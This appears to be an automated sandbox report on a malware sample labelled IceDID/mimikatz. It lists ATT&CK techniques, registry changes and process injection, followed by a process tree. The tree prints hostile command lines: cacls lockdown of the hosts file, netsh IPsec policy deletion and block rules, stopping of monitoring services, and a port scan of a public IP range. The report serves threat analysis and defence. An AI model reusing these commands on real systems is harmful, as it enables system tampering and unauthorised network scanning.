Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wpcap.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vyqvqhk.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	gyggue.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xohudmc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2025-01-19_4502ca2613d9755aaa5f11c2715eb8fd_hacktools_icedid_mimikatz.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vyqvqhk.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	synletgiy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
468	cmd.exe
3192	PING.EXE

NSIS installer 3 IoCs

installer

resource	yara_rule
behavioral2/files/0x000b000000023b80-5.dat	nsis_installer_2
behavioral2/files/0x000a000000023b9c-11.dat	nsis_installer_1
behavioral2/files/0x000a000000023b9c-11.dat	nsis_installer_2

Modifies data under HKEY_USERS 45 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ybiefmuji.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	vyqvqhk.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ybiefmuji.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ybiefmuji.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ybiefmuji.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ybiefmuji.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ybiefmuji.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ybiefmuji.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ybiefmuji.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ybiefmuji.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ybiefmuji.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ybiefmuji.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ybiefmuji.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals	ybiefmuji.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ybiefmuji.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ybiefmuji.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ybiefmuji.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	ybiefmuji.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ybiefmuji.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ybiefmuji.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	vyqvqhk.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	vyqvqhk.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ybiefmuji.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ybiefmuji.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ybiefmuji.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ybiefmuji.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ybiefmuji.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	vyqvqhk.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ybiefmuji.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ybiefmuji.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ybiefmuji.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ybiefmuji.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	vyqvqhk.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ybiefmuji.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ybiefmuji.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	ybiefmuji.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ybiefmuji.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ybiefmuji.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ybiefmuji.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ybiefmuji.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ybiefmuji.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	vyqvqhk.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ybiefmuji.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ybiefmuji.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ybiefmuji.exe

Modifies registry class 14 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\	vyqvqhk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile"	vyqvqhk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\	vyqvqhk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile"	vyqvqhk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile"	vyqvqhk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\	vyqvqhk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\	vyqvqhk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile"	vyqvqhk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile"	vyqvqhk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile"	vyqvqhk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\	vyqvqhk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\	vyqvqhk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\	vyqvqhk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile"	vyqvqhk.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3192	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
5076	schtasks.exe
3024	schtasks.exe
3596	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1924	vyqvqhk.exe
1924	vyqvqhk.exe
1924	vyqvqhk.exe
1924	vyqvqhk.exe
1924	vyqvqhk.exe
1924	vyqvqhk.exe
1924	vyqvqhk.exe
1924	vyqvqhk.exe
1924	vyqvqhk.exe
1924	vyqvqhk.exe
1924	vyqvqhk.exe
1924	vyqvqhk.exe
1924	vyqvqhk.exe
1924	vyqvqhk.exe
1924	vyqvqhk.exe
1924	vyqvqhk.exe
1924	vyqvqhk.exe
1924	vyqvqhk.exe
1924	vyqvqhk.exe
1924	vyqvqhk.exe
1924	vyqvqhk.exe
1924	vyqvqhk.exe
1924	vyqvqhk.exe
1924	vyqvqhk.exe
1924	vyqvqhk.exe
1924	vyqvqhk.exe
1924	vyqvqhk.exe
1924	vyqvqhk.exe
1924	vyqvqhk.exe
1924	vyqvqhk.exe
1924	vyqvqhk.exe
1924	vyqvqhk.exe
1924	vyqvqhk.exe
1924	vyqvqhk.exe
1924	vyqvqhk.exe
1924	vyqvqhk.exe
1924	vyqvqhk.exe
1924	vyqvqhk.exe
1924	vyqvqhk.exe
1924	vyqvqhk.exe
1924	vyqvqhk.exe
1924	vyqvqhk.exe
1924	vyqvqhk.exe
1924	vyqvqhk.exe
1924	vyqvqhk.exe
1924	vyqvqhk.exe
1924	vyqvqhk.exe
1924	vyqvqhk.exe
1924	vyqvqhk.exe
1924	vyqvqhk.exe
1924	vyqvqhk.exe
1924	vyqvqhk.exe
1924	vyqvqhk.exe
1924	vyqvqhk.exe
1924	vyqvqhk.exe
1924	vyqvqhk.exe
1924	vyqvqhk.exe
1924	vyqvqhk.exe
1924	vyqvqhk.exe
1924	vyqvqhk.exe
1924	vyqvqhk.exe
1924	vyqvqhk.exe
1924	vyqvqhk.exe
1924	vyqvqhk.exe

Suspicious behavior: LoadsDriver 15 IoCs

pid	Process
648	Process not Found
648	Process not Found
648	Process not Found
648	Process not Found
648	Process not Found
648	Process not Found
648	Process not Found
648	Process not Found
648	Process not Found
648	Process not Found
648	Process not Found
648	Process not Found
648	Process not Found
648	Process not Found
648	Process not Found

Suspicious behavior: RenamesItself 1 IoCs

pid	Process
116	2025-01-19_4502ca2613d9755aaa5f11c2715eb8fd_hacktools_icedid_mimikatz.exe

Suspicious use of AdjustPrivilegeToken 24 IoCs

description	pid	Process
Token: SeDebugPrivilege	116	2025-01-19_4502ca2613d9755aaa5f11c2715eb8fd_hacktools_icedid_mimikatz.exe
Token: SeDebugPrivilege	1624	vyqvqhk.exe
Token: SeDebugPrivilege	1924	vyqvqhk.exe
Token: SeDebugPrivilege	4620	vfshost.exe
Token: SeDebugPrivilege	2012	ybiefmuji.exe
Token: SeLockMemoryPrivilege	860	illibi.exe
Token: SeLockMemoryPrivilege	860	illibi.exe
Token: SeDebugPrivilege	1856	ybiefmuji.exe
Token: SeDebugPrivilege	1892	ybiefmuji.exe
Token: SeDebugPrivilege	5048	ybiefmuji.exe
Token: SeDebugPrivilege	3900	ybiefmuji.exe
Token: SeDebugPrivilege	3556	ybiefmuji.exe
Token: SeDebugPrivilege	2316	ybiefmuji.exe
Token: SeDebugPrivilege	3576	ybiefmuji.exe
Token: SeDebugPrivilege	1460	ybiefmuji.exe
Token: SeDebugPrivilege	1912	ybiefmuji.exe
Token: SeDebugPrivilege	3776	ybiefmuji.exe
Token: SeDebugPrivilege	4868	ybiefmuji.exe
Token: SeDebugPrivilege	3888	ybiefmuji.exe
Token: SeDebugPrivilege	4800	ybiefmuji.exe
Token: SeDebugPrivilege	1432	ybiefmuji.exe
Token: SeDebugPrivilege	1004	ybiefmuji.exe
Token: SeDebugPrivilege	4260	ybiefmuji.exe
Token: SeDebugPrivilege	1572	ybiefmuji.exe

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
116	2025-01-19_4502ca2613d9755aaa5f11c2715eb8fd_hacktools_icedid_mimikatz.exe
116	2025-01-19_4502ca2613d9755aaa5f11c2715eb8fd_hacktools_icedid_mimikatz.exe
1624	vyqvqhk.exe
1624	vyqvqhk.exe
1924	vyqvqhk.exe
1924	vyqvqhk.exe
4144	xohudmc.exe
2068	gyggue.exe
4920	vyqvqhk.exe
4920	vyqvqhk.exe
2620	vyqvqhk.exe
2620	vyqvqhk.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 116 wrote to memory of 468	116	2025-01-19_4502ca2613d9755aaa5f11c2715eb8fd_hacktools_icedid_mimikatz.exe	83
PID 116 wrote to memory of 468	116	2025-01-19_4502ca2613d9755aaa5f11c2715eb8fd_hacktools_icedid_mimikatz.exe	83
PID 116 wrote to memory of 468	116	2025-01-19_4502ca2613d9755aaa5f11c2715eb8fd_hacktools_icedid_mimikatz.exe	83
PID 468 wrote to memory of 3192	468	cmd.exe	85
PID 468 wrote to memory of 3192	468	cmd.exe	85
PID 468 wrote to memory of 3192	468	cmd.exe	85
PID 468 wrote to memory of 1624	468	cmd.exe	87
PID 468 wrote to memory of 1624	468	cmd.exe	87
PID 468 wrote to memory of 1624	468	cmd.exe	87
PID 1924 wrote to memory of 2300	1924	vyqvqhk.exe	89
PID 1924 wrote to memory of 2300	1924	vyqvqhk.exe	89
PID 1924 wrote to memory of 2300	1924	vyqvqhk.exe	89
PID 2300 wrote to memory of 2328	2300	cmd.exe	91
PID 2300 wrote to memory of 2328	2300	cmd.exe	91
PID 2300 wrote to memory of 2328	2300	cmd.exe	91
PID 2300 wrote to memory of 1424	2300	cmd.exe	92
PID 2300 wrote to memory of 1424	2300	cmd.exe	92
PID 2300 wrote to memory of 1424	2300	cmd.exe	92
PID 2300 wrote to memory of 3856	2300	cmd.exe	93
PID 2300 wrote to memory of 3856	2300	cmd.exe	93
PID 2300 wrote to memory of 3856	2300	cmd.exe	93
PID 2300 wrote to memory of 3548	2300	cmd.exe	94
PID 2300 wrote to memory of 3548	2300	cmd.exe	94
PID 2300 wrote to memory of 3548	2300	cmd.exe	94
PID 2300 wrote to memory of 4556	2300	cmd.exe	95
PID 2300 wrote to memory of 4556	2300	cmd.exe	95
PID 2300 wrote to memory of 4556	2300	cmd.exe	95
PID 2300 wrote to memory of 3164	2300	cmd.exe	96
PID 2300 wrote to memory of 3164	2300	cmd.exe	96
PID 2300 wrote to memory of 3164	2300	cmd.exe	96
PID 1924 wrote to memory of 2500	1924	vyqvqhk.exe	100
PID 1924 wrote to memory of 2500	1924	vyqvqhk.exe	100
PID 1924 wrote to memory of 2500	1924	vyqvqhk.exe	100
PID 1924 wrote to memory of 1816	1924	vyqvqhk.exe	102
PID 1924 wrote to memory of 1816	1924	vyqvqhk.exe	102
PID 1924 wrote to memory of 1816	1924	vyqvqhk.exe	102
PID 1924 wrote to memory of 928	1924	vyqvqhk.exe	104
PID 1924 wrote to memory of 928	1924	vyqvqhk.exe	104
PID 1924 wrote to memory of 928	1924	vyqvqhk.exe	104
PID 1924 wrote to memory of 1436	1924	vyqvqhk.exe	116
PID 1924 wrote to memory of 1436	1924	vyqvqhk.exe	116
PID 1924 wrote to memory of 1436	1924	vyqvqhk.exe	116
PID 1436 wrote to memory of 2332	1436	cmd.exe	118
PID 1436 wrote to memory of 2332	1436	cmd.exe	118
PID 1436 wrote to memory of 2332	1436	cmd.exe	118
PID 2332 wrote to memory of 3216	2332	wpcap.exe	119
PID 2332 wrote to memory of 3216	2332	wpcap.exe	119
PID 2332 wrote to memory of 3216	2332	wpcap.exe	119
PID 3216 wrote to memory of 4188	3216	net.exe	121
PID 3216 wrote to memory of 4188	3216	net.exe	121
PID 3216 wrote to memory of 4188	3216	net.exe	121
PID 2332 wrote to memory of 3884	2332	wpcap.exe	122
PID 2332 wrote to memory of 3884	2332	wpcap.exe	122
PID 2332 wrote to memory of 3884	2332	wpcap.exe	122
PID 3884 wrote to memory of 4172	3884	net.exe	124
PID 3884 wrote to memory of 4172	3884	net.exe	124
PID 3884 wrote to memory of 4172	3884	net.exe	124
PID 2332 wrote to memory of 3020	2332	wpcap.exe	125
PID 2332 wrote to memory of 3020	2332	wpcap.exe	125
PID 2332 wrote to memory of 3020	2332	wpcap.exe	125
PID 3020 wrote to memory of 4552	3020	net.exe	127
PID 3020 wrote to memory of 4552	3020	net.exe	127
PID 3020 wrote to memory of 4552	3020	net.exe	127
PID 2332 wrote to memory of 2480	2332	wpcap.exe	128

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2136
- C:\Windows\TEMP\jbcfjleil\illibi.exe
  "C:\Windows\TEMP\jbcfjleil\illibi.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:860

C:\Users\Admin\AppData\Local\Temp\2025-01-19_4502ca2613d9755aaa5f11c2715eb8fd_hacktools_icedid_mimikatz.exe
"C:\Users\Admin\AppData\Local\Temp\2025-01-19_4502ca2613d9755aaa5f11c2715eb8fd_hacktools_icedid_mimikatz.exe"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:116
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\kbtjlvyu\vyqvqhk.exe
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of WriteProcessMemory
  PID:468
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1 -n 5
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:3192
- - C:\Windows\kbtjlvyu\vyqvqhk.exe
    C:\Windows\kbtjlvyu\vyqvqhk.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:1624

C:\Windows\kbtjlvyu\vyqvqhk.exe
C:\Windows\kbtjlvyu\vyqvqhk.exe
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1924
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2300
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2328
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    3⤵
    PID:1424
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3856
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    3⤵
    PID:3548
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4556
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3164
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static del all
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2500
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add policy name=Bastards description=FuckingBastards
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:1816
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filteraction name=BastardsList action=block
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:928
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\teuulnibr\bftvueiwt\wpcap.exe /S
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1436
- - C:\Windows\teuulnibr\bftvueiwt\wpcap.exe
    C:\Windows\teuulnibr\bftvueiwt\wpcap.exe /S
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2332
  - - C:\Windows\SysWOW64\net.exe
      net stop "Boundary Meter"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3216
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Boundary Meter"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4188
  - - C:\Windows\SysWOW64\net.exe
      net stop "TrueSight Meter"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3884
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "TrueSight Meter"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4172
  - - C:\Windows\SysWOW64\net.exe
      net stop npf
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3020
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop npf
        5⤵
        
        PID:4552
  - - C:\Windows\SysWOW64\net.exe
      net start npf
      4⤵
      System Location Discovery: System Language Discovery
      PID:2480
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start npf
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2996
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4028
- - C:\Windows\SysWOW64\net.exe
    net start npf
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3720
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start npf
      4⤵
      System Location Discovery: System Language Discovery
      PID:4820
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4964
- - C:\Windows\SysWOW64\net.exe
    net start npf
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1424
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start npf
      4⤵
      PID:3856
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\teuulnibr\bftvueiwt\synletgiy.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\teuulnibr\bftvueiwt\Scant.txt
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5080
- - C:\Windows\teuulnibr\bftvueiwt\synletgiy.exe
    C:\Windows\teuulnibr\bftvueiwt\synletgiy.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\teuulnibr\bftvueiwt\Scant.txt
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
